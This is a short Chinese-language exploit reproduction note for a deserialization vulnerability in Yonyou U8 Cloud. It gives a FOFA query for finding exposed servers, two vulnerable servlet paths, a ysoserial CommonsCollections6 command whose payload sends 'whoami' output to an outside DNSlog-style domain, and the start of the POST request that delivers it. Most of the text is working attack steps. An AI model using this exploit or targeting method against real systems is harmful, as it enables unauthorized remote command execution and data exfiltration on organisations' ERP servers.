影响版本
用友U8 Cloud 所有版本
网络空间测绘
FOFA:app=“用友-U8-Cloud”
复现
两处接口的反序列化漏洞路径:
/servlet/~uap/nc.impl.pub.filesystem.FileManageServlet
/servlet/~uap/nc.bs.sm.login2.LoginVideoServlet
用友的反序列化漏洞大部分cc6就可以直接打,post请求传入反序列化的二进制数据 就可以进行命令执行,ysoserial工具集成了多种cc链
java -jar ysoserial-all.jar CommonsCollections6 “ping whoami
.lpfvqbgkeas.dgrh3.cn” >4.ser
POST /servlet/~uap/nc.impl.pub.filesystem.FileManageServlet HTTP/1.1
Host: ip
Content-Type: *